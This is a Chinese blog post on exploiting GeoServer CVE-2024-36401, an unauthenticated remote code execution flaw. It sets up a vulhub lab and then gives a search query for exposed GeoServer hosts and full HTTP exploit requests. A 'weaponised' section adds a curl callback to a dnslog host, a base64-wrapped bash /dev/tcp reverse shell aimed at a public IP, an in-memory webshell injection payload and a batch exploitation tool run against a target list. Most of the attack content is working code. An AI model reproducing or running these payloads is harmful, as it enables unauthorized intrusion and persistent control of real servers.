GeoServer CVE-2024-36401 漏洞利用

Bugatti100Peagle

于 2024-08-16 00:00:00 发布

阅读量1.2k

点赞数 36

分类专栏： CVE漏洞复现文章标签：网络安全 web安全

本文链接：https://blog.csdn.net/Bugatti100Peagle/article/details/141216889

版权

CVE漏洞复现专栏收录该内容

3 篇文章 0 订阅

订阅专栏

GeoServer CVE-2024-36401 漏洞利用

搜索语法

app.name=“GeoServer” and ip.country=“CN” and icp.is_exception=“true”

版本属性

在GeoServer 2.25.1， 2.24.3， 2.23.5版本及以前，未登录的任意用户可以通过构造恶意OGC请求，在默认安装的服务器中执行XPath表达式，进而利用执行Apache Commons Jxpath提供的功能执行任意代码。GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现，利用 GeoServer 可以方便的发布地图数据，允许用户对特征数据进行更新、删除、插入操作。

靶场环境

建议开一个美国区的云服务器，拉取GitHub和Vulhub方便。

git clone https://github.com/vulhub/vulhub.git
cd vulhub/
cd geoserver/CVE-2024-36401/
docker-compose up -d

访问 http://your-ip:8080/geoserver 查看到GeoServer的默认页面。

1723450106639

POC

GET方法的POC

1723450435176

GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0

1723450389978

进入容器查看，可以看到成功创建文件。

docker exec -it cve-2024-36401_web_1 /bin/bash
ls /tmp

基于POST方法的POC

POST /geoserver/wfs HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 356

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'touch /tmp/success2')</wfs:valueReference>
</wfs:GetPropertyValue>

1723450793264

1723450809382

只有 ows:ExceptionReport java.lang.ClassCastException: 的报错是成功执行的。

值得注意的是，typeNames必须存在，我们可以在Web页面中找到当前服务器中的所有Types

DNS 反弹测试

POST /geoserver/wfs HTTP/1.1
Host:47.251.97.142:8080
Accept-Encoding:gzip,deflate,br
Accept:*/*
Accept-Language:en-US;q=0.9,en;q=0.8
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36
Connection:close
Cache-Control:max-age=0
Content-Type:application/xml
Content-Length: 358

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'curl 5s1mc4.dnslog.cn')</wfs:valueReference>
</wfs:GetPropertyValue>

1723530166465

武器化利用

反弹Shell

反弹shell在线生成器在线生成一句话反弹命令

echo "sh -i >& /dev/tcp/攻击机ip/攻击机端口 0>&1" |base64
nc -lvnp 7777 # 攻击机开启监听端口

POST /geoserver/wfs HTTP/1.1
Host:47.251.97.142:8080
Accept-Encoding:gzip,deflate,br
Accept:*/*
Accept-Language:en-US;q=0.9,en;q=0.8
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36
Connection:close
Cache-Control:max-age=0
Content-Type:application/xml
Content-Length: 432

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'bash -c {echo,反弹的base64编码}|{base64,-d}|{bash,-i}')</wfs:valueReference>
</wfs:GetPropertyValue>

注意 Content-Length:357 中数字的长度要和命令的字节数等于或大于才能执行成功，越大执行越慢。

1723518872795

1723523150475

注入内存木马

1723452618835

使用JMG工具生成内存马，注意名写 java.lang.tes，自定义密码密钥点击生成。把输出复制到下面的POC里 str="内存马base64";的位置。

POST /geoserver/wfs HTTP/1.1
Host: 47.251.97.142:8080
Accept-Encoding: gzip,deflate,br
Accept: */*
Accept-Language:en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 432

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>eval(getEngineByName(javax.script.ScriptEngineManager.new(),'js'),'
var str="";
var bt;
try {
    bt = java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance().decodeBuffer(str);
} catch (e) {
    bt = java.util.Base64.getDecoder().decode(str);
}
var theUnsafe = java.lang.Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe");
theUnsafe.setAccessible(true);
unsafe = theUnsafe.get(null);
unsafe.defineAnonymousClass(java.lang.Class.forName("java.lang.Class"), bt, null).newInstance();
')</wfs:valueReference>
</wfs:GetPropertyValue>

POC有问题，不成功，建议使用反弹shell后再用别的工具建立探针控制。

工具批量监测

git clone https://mirror.ghproxy.com/https://github.com/RevoltSecurities/CVE-2024-36401.git
cd CVE-2024-36401/
pip install -r requirements.txt  -i https://pypi.tuna.tsinghua.edu.cn/simple some-package
python exploit.py -l geoserverip.txt

1723517374299

参考链接
https://mp.weixin.qq.com/s/h4oswTGGaxVBLXR_h7PT1Q
https://cloud.tencent.com/developer/article/2437213
https://github.com/vulhub/vulhub/blob/master/geoserver/CVE-2024-36401/README.zh-cn.md
https://github.com/pen4uin/java-memshell-generator
https://xz.aliyun.com/t/14991?time__1311=GqAh0IqGxmxfx0v44%2BxCqqQwwbugt03x
https://github.com/RevoltSecurities/CVE-2024-36401
https://yzddmr6.com/posts/geoserver-memoryshell/
https://cn-sec.com/archives/2997415.html